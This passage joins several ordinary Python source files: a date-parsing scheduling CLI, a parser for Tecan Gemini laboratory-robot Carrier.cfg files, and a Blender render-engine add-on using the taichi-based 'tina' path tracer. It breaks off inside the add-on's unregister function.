            break
        except ValueError:
            # Narrowed from a bare except: malformed input raises ValueError
            # from the splits/int()/datetime() inside readinput.
            timestring = raw_input("Please enter a date in the correct format: ")
    return time
def readinput(timestring,utcoffset=None):
    """Parse 'YYYY-MM-DD/HH:MM:SS' into a datetime.

    utcoffset -- optional timedelta subtracted from the result (local -> UTC).
    Raises ValueError for malformed input.
    """
    date_part, time_part = timestring.split('/')
    year, month, day = (int(p) for p in date_part.split('-'))
    hour, minute, sec = (int(p) for p in time_part.split(':'))
    dt = datetime.datetime(year, month, day, hour, minute, sec)
    # A zero offset is falsy, so subtracting is skipped exactly as before.
    if utcoffset:
        dt -= utcoffset
    return dt
def unpackTime(timestring):
    """Convert 'YYYY-MM-DDTHH:MM:SS(+/-HH:MM)' into a naive UTC datetime.

    Only whole-hour offsets are honoured (the minutes part is ignored),
    matching the original behaviour.
    """
    datepart, timepart = timestring.split('T')
    epoch = datetime.datetime(1970,1,1,0,0,0)
    if '-' in timepart:
        # Negative offset, e.g. 03:04:05-04:00 -> local is UTC-4.
        timepart, offs = timepart.split('-')
        dtz = epoch - datetime.datetime(1970,1,1,int(offs.split(':')[0]))
    elif '+' in timepart:
        # Positive offset, e.g. 03:04:05+05:00 -> local is UTC+5.
        timepart, offs = timepart.split('+')
        dtz = datetime.datetime(1970,1,1,int(offs.split(':')[0])) - epoch
    else:
        # No offset given: treat the time as already UTC.
        dtz = datetime.timedelta(0)
    local = datetime.datetime.strptime(datepart + 'T' + timepart,
                                       "%Y-%m-%dT%H:%M:%S")
    # Go from local to UTC.
    return local - dtz
def schedule():
    """Return the saved task files matching tasks/*.nag.

    BUGFIX: the glob result was previously assigned to a local and discarded;
    returning it makes the stub usable (callers that ignored the None return
    are unaffected).
    """
    return glob.glob("tasks/*.nag")
# Script entry point: launch the interactive CLI (cli() is defined earlier in
# this file, outside the visible region).
if __name__ == '__main__':
    cli()
#s=Schedule(datetime.datetime(2018,4,13,12,0,0),datetime.datetime(2018,4,13,21,0,0))
# Handle Tecan Gemini Carriers and Racks
# Loads data from Carriers.cfg
import pprint
import os
import click
class Carrier(object):
    """Parsed contents of a Tecan Gemini Carrier.cfg file.

    Holds carrier, rack and ROMA-vector records (as dicts) plus the file
    header metadata.  Use Carrier.cfg() for the shared singleton loaded from
    the module directory; loadCFG() parses an arbitrary file.
    """
    instance = None  # class-level slot backing the cfg() singleton
    def __init__(self):
        # File header metadata (filled in by loadCFG).
        self.checksum=None
        self.timestamp=None
        self.username=None
        # Parsed records, one dict per entry.
        self.carriers=[]
        self.racks=[]
        self.vectors=[]
        # Raw fields of the '999' header record; meaning unknown.
        self.data999=None
    @classmethod
    def cfg(cls):
        """Singleton instance of carriers """
        if Carrier.instance is None:
            modpath=os.path.dirname(__file__)
            Carrier.instance = Carrier()
            Carrier.instance.loadCFG(modpath+"/Carrier.cfg")
        return Carrier.instance
    def findrack(self,name):
        """Locate a rack by name"""
        for r in self.racks:
            if r["name"]==name:
                return r
        print(f"Rack with name {name} not found.")
        return None
    def findcarrier(self,name):
        """Locate a carrier by name"""
        for c in self.carriers:
            if c["name"]==name:
                return c
        print(f"Carrier with name {name} not found.")
        return None
    def getcarrier(self, carrierid):
        """Locate a carrier by id"""
        for c in self.carriers:
            if c["id"]==carrierid:
                return c
        print(f"Carrier with ID {carrierid} not found.")
        return None
    # NOTE: intentionally shadows the builtin print when accessed as a method.
    def print(self):
        """Dump the parsed configuration to stdout for inspection."""
        print(f"Checksum: {self.checksum}, Timestamp: {self.timestamp}, User: {self.username}")
        print(f"Data999: {self.data999}")
        print("Carriers:")
        for c in self.carriers:
            pprint.pprint(c)
        print("\nRacks:")
        for r in self.racks:
            pprint.pprint(r)
        print("\nVectors:")
        for c in self.vectors:
            pprint.pprint(c)
    def loadCFG(self, filename):
        """Parse a Carrier.cfg file into self.carriers/racks/vectors.

        Records are semicolon-separated lines whose first field is a numeric
        type code: 13=carrier, 15=rack, 17=ROMA vector, 20=unknown,
        998=continuation data for the preceding record, 999=file header.
        """
        with open(filename,"r") as fd:
            # Fixed four-line header before the record stream.
            self.checksum = fd.readline().strip()
            self.timestamp = fd.readline().strip()
            fd.readline() # Blank?
            self.username = fd.readline().strip()
            lineno=4
            for line in fd:
                lineno+=1
                line=line.strip()
                #print(f"line: {line}")
                fields=line.split(";")
                # Drop the empty field produced by a trailing semicolon.
                if fields[-1]=="":
                    fields=fields[:-1]
                #print(f"{fields[0]}: {fields[1]} {len(fields)-2}")
                # NOTE: `cont` is rebound at each record start; the 998 branch
                # appends to the most recent record's continuation list.
                if fields[0]=="999":
                    cont=[]
                    self.data999=fields[1:]
                elif fields[0]=="13": # Carriers
                    cont=[]
                    # Offsets/dimensions are stored in tenths of a millimetre;
                    # divide by 10 to get mm.
                    carrier = {"name":fields[1],
                        "id":int(fields[2].split("/")[0]),
                        "barcode": int(fields[2].split("/")[1]),
                        "refoffset": [float(f)/10 for f in fields[3].split("/")],
                        "dimensions": [float(f)/10 for f in fields[4].split("/")],
                        "nsites": int(fields[5]),
                        "other":fields[7:],
                        "cont":cont}
                    # Carriers without a barcode appear to be ROMA-only.
                    carrier["romaonly"]=(carrier["barcode"]==0)
                    typecode=int(fields[6])
                    if typecode==0:
                        carrier["type"]="Standard"
                    elif typecode==2:
                        carrier["type"]="Hidden"
                    elif typecode==-3:
                        carrier["type"]="ROMA"
                    elif typecode == 13:
                        carrier["type"] = "Carousel"
                    else:
                        # Unrecognised codes are kept numerically so nothing is lost.
                        print(f"Unknown carrier type code: {typecode} at line {lineno}")
                        carrier["type"]=typecode
                    self.carriers.append(carrier)
                elif fields[0]=="15": # Racks
                    cont=[]
                    assert(int(fields[2])==0) # Unknown what it is, but always zero
                    # zcoords: stored as tenths of a mm measured down from a
                    # 210mm reference — presumably deck height; TODO confirm.
                    rack = {"name":fields[1],
                        #"unk1":int(fields[2]),
                        "wells":[int(f) for f in fields[3].split("/")],
                        "wellpos":[int(f) for f in fields[4].split("/")],
                        "zcoords":{k: (2100-int(f))/10.0 for k, f in zip(['max','start','dispense','travel'], fields[5].split("/"))},
                        "area":float(fields[6]),
                        "tipsperwell":int(fields[7]),
                        "tiptouchdist":float(fields[8]),
                        "piercing":[int(f) for f in fields[9].split("/")],
                        "type":int(fields[10]),
                        "diti":{"capacity":float(fields[11]),"offset":float(fields[12])}, # TODO: int?
                        "depth":float(fields[13]),
                        "precise":{"active":int(fields[14]),"xstart":int(fields[15]),"ystart":int(fields[16]),"speed":float(fields[17])},
                        "npos": int(fields[18]),
                        "other":fields[19:],
                        "cont":cont}
                    self.racks.append(rack)
                elif fields[0]=="17": # ROMA Vector
                    cont=[]
                    # Distances/speeds stored in tenths; converted on load.
                    vector = {"name":fields[1],
                        "grip": {"gripdist":float(fields[2].split("/")[0])/10,
                            "reldist": float(fields[2].split("/")[1]) / 10,
                            "force": float(fields[2].split("/")[2]),
                            "speed": float(fields[2].split("/")[3]) / 10},
                        "xyzspeed": float(fields[3].split("/")[0])/10,
                        "rotspeed": float(fields[3].split("/")[1])/10,
                        "nsteps": int(fields[4]),
                        "carrierid": int(fields[5]),
                        "other":fields[6:],
                        "cont":cont}
                    self.vectors.append(vector)
                elif fields[0]=="20":
                    # Record type 20 is unidentified; its continuations are discarded.
                    #print(f"{fields[0]}: {fields[1]} {len(fields)-2}")
                    cont=[]
                elif fields[0]=="998":
                    # Continuation line: flatten the '/'-separated ints and attach
                    # to the current record's cont list.
                    cont.append([int(fn) for f in fields[1:] for fn in f.split("/") ])
                else:
                    print(f"Unknown field code {fields[0]} at line {lineno}")
        # Clean up continuation lines
        for v in self.vectors:
            assert(v["nsteps"] == len(v["cont"]))
            # r encodes rotation in 0.1 degrees; values >= 10000 flag absolute moves.
            v["steps"]=[{"x":d[0]/10.0,"y":d[1],"z":d[2]/10.0,"r":(d[3]%10000)/10.0,"abs":d[3]>=10000} for d in v["cont"]]
            del v["cont"]
            del v["nsteps"] # Redundant
        for c in self.carriers:
            assert(c["nsites"]+1 == len(c["cont"]))
            # One continuation entry per site plus one trailing record.
            c["sites"]=[{"shape":d[0],"xsize":d[1]/10.0,"ysize":d[2]/10.0,"xoffset":d[3]/10.0,"yoffset":d[4]/10.0,"zoffset":d[5]/10.0} for d in c["cont"][:-1]]
            c["cont"]=c["cont"][-1] # Unsure what this last line is for
            del c["nsites"]
        for r in self.racks:
            assert(r["npos"] == len(r["cont"]))
            # d[1] is a bitmask of which carrier positions accept this rack.
            r["allowed"]=[{"carrier":d[0],"positions":[p+1 for p in range(10) if d[1]&(1<<p)]} for d in r["cont"]]
            if r["npos"]>0:
                r["unk"]=r["cont"][-1][2]
            del r["npos"]
            del r["cont"]
@click.command()
@click.option('--filename','-f',help="File to load")
@click.option('--dump','-d',is_flag=True,help="Dump contents")
def main(filename,dump):
    """CLI entry point: parse the given Carrier.cfg and optionally dump it."""
    # A fresh instance is used deliberately (not the Carrier.cfg() singleton)
    # so an arbitrary file can be inspected.
    carrier = Carrier()
    carrier.loadCFG(filename)
    if dump:
        carrier.print()
if __name__ == '__main__':
    main()
|
import bpy
import bgl
import taichi as ti
import numpy as np
import tina
def calc_camera_matrices(depsgraph):
    """Return (view, projection) matrices of the scene camera as numpy arrays.

    The projection is computed at the render resolution scaled by the
    resolution percentage; the view matrix is the inverted camera world matrix.
    """
    scene = depsgraph.scene
    cam = scene.camera
    render = scene.render
    scale = render.resolution_percentage / 100.0
    proj = np.array(cam.calc_matrix_camera(
        depsgraph,
        x=render.resolution_x * scale,
        y=render.resolution_y * scale,
        scale_x=render.pixel_aspect_x,
        scale_y=render.pixel_aspect_y))
    view = np.linalg.inv(np.array(cam.matrix_world))
    return view, proj
def bmesh_verts_to_numpy(bm):
    """Collect bmesh vertex coordinates into an (N, 3) float32 array."""
    coords = [vert.co for vert in bm.verts]
    # Empty meshes need an explicit shape; np.array([]) would be 1-D.
    if not coords:
        return np.zeros((0, 3), dtype=np.float32)
    return np.array(coords, dtype=np.float32)
def bmesh_faces_to_numpy(bm):
    """Collect per-face vertex indices into an (F, 3) int32 array.

    Assumes the mesh was triangulated beforehand — TODO confirm at call sites.
    """
    indices = [[vert.index for vert in face.verts] for face in bm.faces]
    # Preserve the (0, 3) shape for meshes without faces.
    if not indices:
        return np.zeros((0, 3), dtype=np.int32)
    return np.array(indices, dtype=np.int32)
def bmesh_face_norms_to_numpy(bm):
    """Per-face per-corner normals as an (F, 3, 3) float32 array.

    Smooth faces use the vertex normals of their corners; flat faces repeat
    the face normal for every corner.
    """
    if len(bm.verts) == 0:
        vnorms = np.zeros((0, 3), dtype=np.float32)
    else:
        vnorms = np.array([vert.normal for vert in bm.verts])
    norms = []
    for face in bm.faces:
        if face.smooth:
            norms.append([vnorms[vert.index] for vert in face.verts])
        else:
            norms.append([face.normal for _ in face.verts])
    if not norms:
        return np.zeros((0, 3, 3), dtype=np.float32)
    return np.array(norms, dtype=np.float32)
def bmesh_face_coors_to_numpy(bm):
    """Per-face per-corner UVs as an (F, 3, 2) float32 array.

    Returns zeros when the mesh has no active UV layer.
    """
    layer = bm.loops.layers.uv.active
    if layer is None:
        return np.zeros((len(bm.faces), 3, 2), dtype=np.float32)
    coors = [[loop[layer].uv for loop in face.loops] for face in bm.faces]
    if not coors:
        return np.zeros((0, 3, 2), dtype=np.float32)
    return np.array(coors, dtype=np.float32)
def blender_get_object_mesh(object, depsgraph=None):
    """Evaluate *object* through the depsgraph and return (verts, norms, coors).

    The mesh is triangulated first; verts gathers the corner positions per
    triangle, norms and coors are the matching per-corner normals and UVs.
    """
    import bmesh
    mesh = bmesh.new()
    if depsgraph is None:
        depsgraph = bpy.context.evaluated_depsgraph_get()
    evaluated = object.evaluated_get(depsgraph)
    mesh.from_object(evaluated, depsgraph)
    bmesh.ops.triangulate(mesh, faces=mesh.faces)
    face_indices = bmesh_faces_to_numpy(mesh)
    verts = bmesh_verts_to_numpy(mesh)[face_indices]
    norms = bmesh_face_norms_to_numpy(mesh)
    coors = bmesh_face_coors_to_numpy(mesh)
    return verts, norms, coors
class TinaMaterialPanel(bpy.types.Panel):
    '''Tina material options'''
    bl_label = 'Tina Material'
    bl_idname = 'MATERIAL_PT_tina'
    bl_space_type = 'PROPERTIES'
    bl_region_type = 'WINDOW'
    bl_context = 'material'
    def draw(self, context):
        """Draw a node-group picker for the active object's Tina material."""
        layout = self.layout
        object = context.object
        # tina_material holds the name of a node group in bpy.data.node_groups
        # (registered on Object in register()).
        layout.prop_search(object, 'tina_material', bpy.data, 'node_groups')
        layout.operator('scene.tina_reset')
class TinaLightPanel(bpy.types.Panel):
    '''Tina light options'''
    bl_label = 'Tina Light'
    bl_idname = 'DATA_PT_tina'
    bl_space_type = 'PROPERTIES'
    bl_region_type = 'WINDOW'
    bl_context = 'data'
    def draw(self, context):
        """Expose Tina color/strength for light objects only."""
        layout = self.layout
        object = context.object
        # The properties live on the light datablock, not on the object.
        if object.type == 'LIGHT':
            layout.prop(object.data, 'tina_color')
            layout.prop(object.data, 'tina_strength')
        layout.operator('scene.tina_reset')
class TinaWorldPanel(bpy.types.Panel):
    '''Tina world options'''
    bl_label = 'Tina World'
    bl_idname = 'WORLD_PT_tina'
    bl_space_type = 'PROPERTIES'
    bl_region_type = 'WINDOW'
    bl_context = 'world'
    def draw(self, context):
        """Expose the world (environment) Tina color and strength."""
        layout = self.layout
        world = context.scene.world
        layout.prop(world, 'tina_color')
        layout.prop(world, 'tina_strength')
        layout.operator('scene.tina_reset')
class TinaRenderPanel(bpy.types.Panel):
    '''Tina render options'''
    bl_label = 'Tina Render'
    bl_idname = 'RENDER_PT_tina'
    bl_space_type = 'PROPERTIES'
    bl_region_type = 'WINDOW'
    bl_context = 'render'
    def draw(self, context):
        """Expose the TinaRenderProperties stored on the scene."""
        layout = self.layout
        options = context.scene.tina_render
        layout.prop(options, 'render_samples')
        layout.prop(options, 'viewport_samples')
        layout.prop(options, 'start_pixel_size')
        # Smoothing/texturing share one row to keep the panel compact.
        row = layout.row()
        row.prop(options, 'smoothing')
        row.prop(options, 'texturing')
        layout.operator('scene.tina_reset')
class TinaRenderEngine(bpy.types.RenderEngine):
    """Blender RenderEngine backed by the Tina (taichi) path tracer.

    Handles final renders via render() and interactive viewport drawing via
    view_update()/view_draw() with coarse-to-fine progressive sampling.
    """
    # These three members are used by blender to set up the
    # RenderEngine; define its internal name, visible name and capabilities.
    bl_idname = "TINA"
    bl_label = "Tina"
    bl_use_preview = True
    # Init is called whenever a new render engine instance is created. Multiple
    # instances may exist at the same time, for example for a viewport and final
    # render.
    def __init__(self):
        self.scene_data = None          # truthy once the viewport scene was built
        self.draw_data = None           # last TinaDrawData used by view_draw
        self.object_to_mesh = {}        # Object -> (world, verts, norms, coors, mtlid)
        self.material_to_id = {}        # node-group name -> index in scene.materials
        self.nblocks = 0                # current preview block size (pixels)
        self.nsamples = 0               # samples accumulated in the viewport
        self.viewport_samples = 16      # NOTE(review): appears unused; the scene
                                        # property viewport_samples is read instead
    # When the render engine instance is destroy, this is called. Clean up any
    # render engine data here, for example stopping running render threads.
    def __del__(self):
        pass
    def __setup_mesh_object(self, object, depsgraph):
        """Extract *object*'s mesh and material, cache in object_to_mesh."""
        print('adding mesh object', object.name, object.tina_material)
        verts, norms, coors = blender_get_object_mesh(object, depsgraph)
        world = np.array(object.matrix_world)
        if not object.tina_material:
            # No Tina material assigned: fall back to the default material 0.
            matr, mtlid = self.scene.materials[0], 0
        else:
            # Build the material from its node group the first time it is seen.
            if object.tina_material not in self.material_to_id:
                tree = bpy.data.node_groups[object.tina_material]
                from .node_system import construct_material_output
                matr = construct_material_output(tree)
                self.material_to_id[object.tina_material] = len(self.scene.materials)
                self.scene.materials.append(matr)
            mtlid = self.material_to_id[object.tina_material]
        self.object_to_mesh[object] = world, verts, norms, coors, mtlid
    def __update_mesh_object(self, object, depsgraph):
        """Refresh the cached mesh data for *object* (same logic as setup)."""
        print('updating mesh object', object.name)
        verts, norms, coors = blender_get_object_mesh(object, depsgraph)
        world = np.array(object.matrix_world)
        if not object.tina_material:
            matr, mtlid = self.scene.materials[0], 0
        else:
            if object.tina_material not in self.material_to_id:
                tree = bpy.data.node_groups[object.tina_material]
                from .node_system import construct_material_output
                matr = construct_material_output(tree)
                self.material_to_id[object.tina_material] = len(self.scene.materials)
                self.scene.materials.append(matr)
            mtlid = self.material_to_id[object.tina_material]
        self.object_to_mesh[object] = world, verts, norms, coors, mtlid
    def __setup_scene(self, depsgraph):
        """Create the tina.PTScene and register every mesh object in it."""
        scene = depsgraph.scene
        options = scene.tina_render
        self.scene = tina.PTScene(
            (self.size_x, self.size_y),
            smoothing=options.smoothing,
            texturing=options.texturing)
        self.scene.lighting = tina.Lighting()
        for object in depsgraph.ids:
            if isinstance(object, bpy.types.Object):
                if object.type == 'MESH':
                    self.__setup_mesh_object(object, depsgraph)
        # Meshes are added once taichi materializes its kernels.
        @ti.materialize_callback
        def init_scene():
            for world, verts, norms, coors, mtlid in self.object_to_mesh.values():
                self.scene.add_mesh(world, verts, norms, coors, mtlid)
    def __update_scene(self, depsgraph):
        """Apply depsgraph updates: drop deleted objects, refresh changed ones."""
        need_update = False
        for update in depsgraph.updates:
            object = update.id
            if isinstance(object, bpy.types.Scene):
                # A scene update may mean objects were removed; reconcile caches.
                obj_to_del = []
                for obj in self.object_to_mesh:
                    if obj.name not in object.objects:
                        # this object was deleted
                        print('delete object', obj)
                        obj_to_del.append(obj)
                for obj in obj_to_del:
                    del self.object_to_mesh[obj]
                    need_update = True
            if isinstance(object, bpy.types.Object):
                if object.type == 'MESH':
                    self.__update_mesh_object(object, depsgraph)
                    need_update = True
        if need_update:
            # Rebuild the tina scene from the cache and restart sampling.
            self.scene.clear_objects()
            for world, verts, norms, coors, mtlid in self.object_to_mesh.values():
                self.scene.add_mesh(world, verts, norms, coors, mtlid)
            self.scene.update()
            self.__reset_samples(depsgraph.scene)
    def __reset_samples(self, scene):
        """Restart progressive viewport sampling at the coarsest block size."""
        self.nsamples = 0
        self.nblocks = scene.tina_render.start_pixel_size
    # This is the method called by Blender for both final renders (F12) and
    # small preview for materials, world and lights.
    def render(self, depsgraph):
        scene = depsgraph.scene
        scale = scene.render.resolution_percentage / 100.0
        self.size_x = int(scene.render.resolution_x * scale)
        self.size_y = int(scene.render.resolution_y * scale)
        view, proj = calc_camera_matrices(depsgraph)
        self.__setup(depsgraph, proj @ view)
        # Here we write the pixel values to the RenderResult
        result = self.begin_result(0, 0, self.size_x, self.size_y)
        nsamples = scene.tina_render.render_samples
        for samp in range(nsamples):
            self.update_stats('Rendering', f'{samp}/{nsamples} Samples')
            self.update_progress((samp + .5) / nsamples)
            # Allow the user to cancel between samples.
            if self.test_break():
                break
            self.scene.render()
            img = self.scene.raw_img
            #img = np.ones((self.size_x, self.size_y, 4))
            # Blender expects row-major (y, x) data; swap tina's axes.
            img = np.ascontiguousarray(img.swapaxes(0, 1))
            rect = img.reshape(self.size_x * self.size_y, 4).tolist()
            # import code; code.interact(local=locals())
            layer = result.layers[0].passes["Combined"]
            layer.rect = rect
            self.update_result(result)
        else:
            # for/else: only reached when the loop was not cancelled.
            self.update_progress(1.0)
        self.end_result(result)
    def __setup(self, depsgraph, perspective):
        """Initialize taichi, build the scene and set the camera matrix."""
        ti.init(ti.gpu)
        self.update_stats('Initializing', 'Loading scene')
        self.__setup_scene(depsgraph)
        self.update_stats('Initializing', 'Constructing tree')
        self.scene.update()
        self.scene.engine.set_camera(np.eye(4), np.array(perspective))
    def __update_camera(self, perspective):
        """Push a new combined view-projection matrix to the engine."""
        self.scene.engine.set_camera(np.eye(4), np.array(perspective))
    # For viewport renders, this method gets called once at the start and
    # whenever the scene or 3D viewport changes. This method is where data
    # should be read from Blender in the same thread. Typically a render
    # thread will be started to do the work while keeping Blender responsive.
    def view_update(self, context, depsgraph):
        print('view_update')
        region = context.region
        region3d = context.region_data
        view3d = context.space_data
        scene = depsgraph.scene
        # Get viewport dimensions
        dimensions = region.width, region.height
        perspective = region3d.perspective_matrix.to_4x4()
        self.size_x, self.size_y = dimensions
        if not self.scene_data:
            # First time initialization
            self.scene_data = True
            first_time = True
            # Loop over all datablocks used in the scene.
            print('setup scene')
            self.__setup(depsgraph, perspective)
        else:
            first_time = False
            print('update scene')
            # Test which datablocks changed
            for update in depsgraph.updates:
                print("Datablock updated:", update.id.name)
            self.__update_scene(depsgraph)
        # Test if any material was added, removed or changed.
        if depsgraph.id_type_updated('MATERIAL'):
            print("Materials updated")
        # Loop over all object instances in the scene.
        # NOTE(review): this loop is currently a no-op placeholder.
        if first_time or depsgraph.id_type_updated('OBJECT'):
            for instance in depsgraph.object_instances:
                pass
    # For viewport renders, this method is called whenever Blender redraws
    # the 3D viewport. The renderer is expected to quickly draw the render
    # with OpenGL, and not perform other expensive work.
    # Blender will draw overlays for selection and editing on top of the
    # rendered image automatically.
    def view_draw(self, context, depsgraph):
        print('view_draw')
        region = context.region
        region3d = context.region_data
        scene = depsgraph.scene
        max_samples = scene.tina_render.viewport_samples
        # Get viewport dimensions
        dimensions = region.width, region.height
        perspective = region3d.perspective_matrix.to_4x4()
        # Bind shader that converts from scene linear to display space,
        bgl.glEnable(bgl.GL_BLEND)
        bgl.glBlendFunc(bgl.GL_ONE, bgl.GL_ONE_MINUS_SRC_ALPHA)
        self.bind_display_space_shader(scene)
        # A resize or camera move invalidates accumulated samples.
        if not self.draw_data or self.draw_data.dimensions != dimensions \
                or self.draw_data.perspective != perspective:
            self.__reset_samples(scene)
            self.__update_camera(perspective)
        if self.nsamples < max_samples:
            # While still refining block size (>1), restart accumulation each
            # pass; at full resolution (==1) accumulate samples normally.
            if self.nblocks > 1:
                self.nsamples = 0
                self.scene.clear()
            else:
                if self.nblocks == 1:
                    self.scene.clear()
                self.nsamples += 1
            self.scene.render(blocksize=self.nblocks)
            self.draw_data = TinaDrawData(self.scene, dimensions, perspective,
                    self.nblocks)
            self.update_stats('Rendering', f'{self.nsamples}/{max_samples} Samples')
        if self.nsamples < max_samples or self.nblocks != 0:
            # Keep redrawing until sampling converged and blocks hit zero.
            self.tag_redraw()
        # Halve the preview block size each redraw: coarse-to-fine refinement.
        self.nblocks //= 2
        self.draw_data.draw()
        self.unbind_display_space_shader()
        bgl.glDisable(bgl.GL_BLEND)
class TinaDrawData:
    """Holds the GL texture + quad used to blit one rendered frame.

    A new instance is created per view_draw pass; __del__ frees the GL
    resources it allocated.
    """
    def __init__(self, scene, dimensions, perspective, blocksize):
        print('redraw!')
        # Generate dummy float image buffer
        self.dimensions = dimensions
        self.perspective = perspective
        width, height = dimensions
        resx, resy = scene.res
        # At blocksize > 0 the render is downsampled; shrink the texture too.
        if blocksize != 0:
            resx //= blocksize
            resy //= blocksize
        pixels = np.empty(resx * resy * 3, np.float32)
        scene._fast_export_image(pixels, blocksize)
        self.pixels = bgl.Buffer(bgl.GL_FLOAT, resx * resy * 3, pixels)
        # Generate texture
        self.texture = bgl.Buffer(bgl.GL_INT, 1)
        bgl.glGenTextures(1, self.texture)
        bgl.glActiveTexture(bgl.GL_TEXTURE0)
        bgl.glBindTexture(bgl.GL_TEXTURE_2D, self.texture[0])
        bgl.glTexImage2D(bgl.GL_TEXTURE_2D, 0, bgl.GL_RGB16F, resx, resy, 0, bgl.GL_RGB, bgl.GL_FLOAT, self.pixels)
        # NEAREST filtering keeps coarse preview blocks crisp.
        bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MIN_FILTER, bgl.GL_NEAREST)
        bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MAG_FILTER, bgl.GL_NEAREST)
        bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_WRAP_S, bgl.GL_CLAMP_TO_EDGE)
        bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_WRAP_T, bgl.GL_CLAMP_TO_EDGE)
        bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
        # Bind shader that converts from scene linear to display space,
        # use the scene's color management settings.
        shader_program = bgl.Buffer(bgl.GL_INT, 1)
        bgl.glGetIntegerv(bgl.GL_CURRENT_PROGRAM, shader_program)
        # Generate vertex array
        self.vertex_array = bgl.Buffer(bgl.GL_INT, 1)
        bgl.glGenVertexArrays(1, self.vertex_array)
        bgl.glBindVertexArray(self.vertex_array[0])
        # Attribute locations come from Blender's display-space shader.
        texturecoord_location = bgl.glGetAttribLocation(shader_program[0], "texCoord")
        position_location = bgl.glGetAttribLocation(shader_program[0], "pos")
        bgl.glEnableVertexAttribArray(texturecoord_location)
        bgl.glEnableVertexAttribArray(position_location)
        # Generate geometry buffers for drawing textured quad
        position = [0.0, 0.0, width, 0.0, width, height, 0.0, height]
        position = bgl.Buffer(bgl.GL_FLOAT, len(position), position)
        texcoord = [0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0]
        texcoord = bgl.Buffer(bgl.GL_FLOAT, len(texcoord), texcoord)
        self.vertex_buffer = bgl.Buffer(bgl.GL_INT, 2)
        bgl.glGenBuffers(2, self.vertex_buffer)
        # 32 bytes = 8 floats * 4 bytes for each quad attribute buffer.
        bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, self.vertex_buffer[0])
        bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, position, bgl.GL_STATIC_DRAW)
        bgl.glVertexAttribPointer(position_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
        bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, self.vertex_buffer[1])
        bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, texcoord, bgl.GL_STATIC_DRAW)
        bgl.glVertexAttribPointer(texturecoord_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
        bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
        bgl.glBindVertexArray(0)
    def __del__(self):
        # Release the GL objects created in __init__.
        bgl.glDeleteBuffers(2, self.vertex_buffer)
        bgl.glDeleteVertexArrays(1, self.vertex_array)
        bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
        bgl.glDeleteTextures(1, self.texture)
    def draw(self):
        """Blit the cached texture to the viewport as a fullscreen quad."""
        bgl.glActiveTexture(bgl.GL_TEXTURE0)
        bgl.glBindTexture(bgl.GL_TEXTURE_2D, self.texture[0])
        bgl.glBindVertexArray(self.vertex_array[0])
        bgl.glDrawArrays(bgl.GL_TRIANGLE_FAN, 0, 4)
        bgl.glBindVertexArray(0)
        bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
# RenderEngines also need to tell UI Panels that they are compatible with.
# We recommend to enable all panels marked as BLENDER_RENDER, and then
# exclude any panels that are replaced by custom panels registered by the
# render engine, or that are not supported.
def get_panels():
    """Collect all BLENDER_RENDER-compatible UI panels except those replaced
    by Tina's own panels."""
    exclude_panels = {
        'VIEWLAYER_PT_filter',
        'VIEWLAYER_PT_layer_passes',
    }
    return [
        panel
        for panel in bpy.types.Panel.__subclasses__()
        if hasattr(panel, 'COMPAT_ENGINES')
        and 'BLENDER_RENDER' in panel.COMPAT_ENGINES
        and panel.__name__ not in exclude_panels
    ]
class TinaRenderProperties(bpy.types.PropertyGroup):
    """Tina render settings, attached to the scene as Scene.tina_render."""
    # Samples per pixel for final (F12) renders.
    render_samples: bpy.props.IntProperty(name='Render Samples', min=1, default=128)
    # Samples accumulated progressively in the 3D viewport.
    viewport_samples: bpy.props.IntProperty(name='Viewport Samples', min=1, default=32)
    # Initial block size for the coarse-to-fine viewport preview.
    start_pixel_size: bpy.props.IntProperty(name='Start Pixel Size', min=1, default=8)
    smoothing: bpy.props.BoolProperty(name='Smoothing', default=True)
    texturing: bpy.props.BoolProperty(name='Texturing', default=True)
class TinaResetOperator(bpy.types.Operator):
    '''Reset Tina Renderer'''
    bl_idname = "scene.tina_reset"
    bl_label = "Reset Tina"
    @classmethod
    def poll(cls, context):
        # The operator is always available.
        return True
    def execute(self, context):
        # BUGFIX: removed the stray statement `bpy.a`, which raised
        # AttributeError every time the operator was invoked.
        return {'FINISHED'}
def register():
    """Register Tina properties, the render engine, operator and panels."""
    bpy.utils.register_class(TinaRenderProperties)
    # Custom properties read by the panels and the render engine.
    bpy.types.Object.tina_material = bpy.props.StringProperty(name='Material')
    bpy.types.Light.tina_color = bpy.props.FloatVectorProperty(name='Color', subtype='COLOR', min=0, max=1, default=(1, 1, 1))
    bpy.types.Light.tina_strength = bpy.props.FloatProperty(name='Strength', min=0, default=16)
    bpy.types.World.tina_color = bpy.props.FloatVectorProperty(name='Color', subtype='COLOR', min=0, max=1, default=(0.04, 0.04, 0.04))
    # BUGFIX: World.tina_strength was assigned twice in a row; once suffices.
    bpy.types.World.tina_strength = bpy.props.FloatProperty(name='Strength', min=0, default=1)
    bpy.types.Scene.tina_render = bpy.props.PointerProperty(name='tina', type=TinaRenderProperties)
    bpy.utils.register_class(TinaRenderEngine)
    bpy.utils.register_class(TinaResetOperator)
    bpy.utils.register_class(TinaMaterialPanel)
    bpy.utils.register_class(TinaLightPanel)
    bpy.utils.register_class(TinaWorldPanel)
    bpy.utils.register_class(TinaRenderPanel)
    # Make the standard BLENDER_RENDER panels show up for the TINA engine too.
    for panel in get_panels():
        panel.COMPAT_ENGINES.add('TINA')
def unregister():
    """Undo register(): remove classes, panel compatibility and properties."""
    bpy.utils.unregister_class(TinaRenderEngine)
    bpy.utils.unregister_class(TinaResetOperator)
    bpy.utils.unregister_class(TinaMaterialPanel)
    bpy.utils.unregister_class(TinaLightPanel)
    bpy.utils.unregister_class(TinaWorldPanel)
    bpy.utils.unregister_class(TinaRenderPanel)
    # Strip TINA from the compatibility sets extended in register().
    for panel in get_panels():
